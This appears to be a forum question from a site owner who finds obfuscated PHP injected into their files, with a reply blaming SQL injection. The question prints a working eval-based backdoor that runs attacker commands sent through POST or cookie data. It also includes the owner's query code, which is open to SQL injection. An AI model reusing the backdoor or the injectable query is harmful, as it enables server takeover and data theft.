PHP Parse error: syntax error, unexpected '$y6956096d' (T_VARIABLE)

Question

i'm running webservices on my site,but when 'm running files like login or register page a php code is running automatically and also it keep adding on same file.below is the code added automatically

<?php $s43150 = 940;$GLOBALS['r3ba0']=Array();global$r3ba0;$r3ba0=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['x09b398d7']="\x51\x6b\x22\x57\x61\x55\x3c\x58\x65\x71\x35\x60\xa\x45\x33\x7a\x5e\x77\x27\x36\x2a\x70\x31\x29\x37\x7e\x68\x7b\x2e\x7d\x34\xd\x4f\x53\x74\x46\x73\x2f\x3b\x78\x5f\x5b\x4d\x3e\x5a\x2c\x40\x28\x59\x6a\x72\x24\x38\x54\x2b\x6c\x76\x62\x43\x32\x5c\x64\x63\x41\x9\x67\x3f\x7c\x30\x6d\x5d\x26\x75\x20\x66\x4c\x47\x25\x50\x21\x52\x79\x2d\x6f\x48\x4a\x49\x42\x4b\x56\x6e\x3a\x4e\x3d\x39\x44\x69\x23";$r3ba0[$r3ba0['x09b398d7'][81].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][68].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][61]]=$r3ba0['x09b398d7'][21].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][1];$r3ba0[$r3ba0['x09b398d7'][81].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][94].$r3ba0['x09b398d7'][57]]=$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][83].$r3ba0['x09b398d7'][72].$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][34];$r3ba0[$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][22]]=$r3ba0['x09b398d7'][36].$r3ba0['x09b398d7'][72].$r3ba0['x09b398d7'][57].$r3ba0['x09b398d7'][36].$r3ba0['x09b398d7'][34].$r3ba0['x09b398d7'][50];$r3ba0[$r3ba0['x09b398d7'][65].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][68]]=$r3ba0['x09b398d7'][36].$r3ba0['x09b398d7'][34].$r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][55].$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][90];$r3ba0[$r3ba0['x09b398d7'][72].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][14]]=$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][39].$r3ba0['x09b398d7'][21].$r3ba0['x09b398d7'][55].$r3ba0['x09b398d7'][83].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][8];$r3ba0[$r3ba0['x09b398d7'][36].$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][61]]=$r3ba0['x09b398d7'][36].$r3ba0['x09b398d7'][34].$r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][40].$r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][21].$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][34];$r3ba0[$r3ba0['x09b398d7'][49].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][61]]=$_POST;$r3ba0[$r3ba0['x09b398d7'][1].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][14]]=$_COOKIE;$s5e5=Array($r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][83].$r3ba0['x09b398d7'][69].$r3ba0['x09b398d7'][22]=>$r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][83].$r3ba0['x09b398d7'][69].$r3ba0['x09b398d7'][59]);$oe83a70e=Array($r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][83].$r3ba0['x09b398d7'][69].$r3ba0['x09b398d7'][14]=>$r3ba0['x09b398d7'][50].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][83].$r3ba0['x09b398d7'][69].$r3ba0['x09b398d7'][30]);foreach(Array($s5e5,$r3ba0[$r3ba0['x09b398d7'][49].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][61]],$oe83a70e,$r3ba0[$r3ba0['x09b398d7'][1].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][14]])as$w67e){foreach($w67eas$t8d84db=>$bc4918ae){$bc4918ae=@$r3ba0[$r3ba0['x09b398d7'][81].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][68].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][61]]($r3ba0['x09b398d7'][84].$r3ba0['x09b398d7'][20],$bc4918ae);$t8d84db.=$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][14].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][82].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][68].$r3ba0['x09b398d7'][82].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][94].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][82].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][14].$r3ba0['x09b398d7'][14].$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][82].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][74].$r3ba0['x09b398d7'][68].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][74];$kfa8=$bc4918ae^$r3ba0[$r3ba0['x09b398d7'][90].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][24].$r3ba0['x09b398d7'][22]]($r3ba0[$r3ba0['x09b398d7'][36].$r3ba0['x09b398d7'][8].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][62].$r3ba0['x09b398d7'][61]]($t8d84db,($r3ba0[$r3ba0['x09b398d7'][65].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][68]]($bc4918ae)/$r3ba0[$r3ba0['x09b398d7'][65].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][68]]($t8d84db))+1),0,$r3ba0[$r3ba0['x09b398d7'][65].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][10].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][68]]($bc4918ae));$kfa8=$r3ba0[$r3ba0['x09b398d7'][72].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][30].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][52].$r3ba0['x09b398d7'][22].$r3ba0['x09b398d7'][19].$r3ba0['x09b398d7'][14]]($r3ba0['x09b398d7'][97],$kfa8);if($r3ba0[$r3ba0['x09b398d7'][81].$r3ba0['x09b398d7'][59].$r3ba0['x09b398d7'][61].$r3ba0['x09b398d7'][4].$r3ba0['x09b398d7'][94].$r3ba0['x09b398d7'][57]]($kfa8)==3){eval/*ffbabfdf*/($kfa8[1]($kfa8[2]));exit();}}} ?>

and after running the file below error coming

PHP Parse error:  syntax error, unexpected '$y6956096d' (T_VARIABLE)

I'm unable to find what type of error is this. Is this a virus that coming to my files while running webservices or it is result of my code that coming after hitting the php code.

My php code

<?php
include 'dbconnect.php';

if($_SERVER['REQUEST_METHOD']=="GET"){
    $sub_product=$_GET['sub_product'];

$sql="SELECT distinct `color_name` FROM `product_of_interest` WHERE `sub_product`='$sub_product'";
    $result=mysqli_query($con,$sql);
    $row=mysqli_num_rows($result);

    if($row>0){
        while($r=mysqli_fetch_assoc($result)){
            $name=$r['color_name'];
            $res[]=array("color"=>$name);


        }
    }else{
        $res=array();
    }
    $json=array("response"=>200,"message"=>$res);
}
else{
    $json=array("response"=>408,"message"=>"Request method not accepted");
}

echo json_encode($json);
mysqli_close($con);
header('Content-type:application/json');
?>

Answer 1

You code contains a SQL injection point and your server is getting hacked over this script. You should use prepared statements.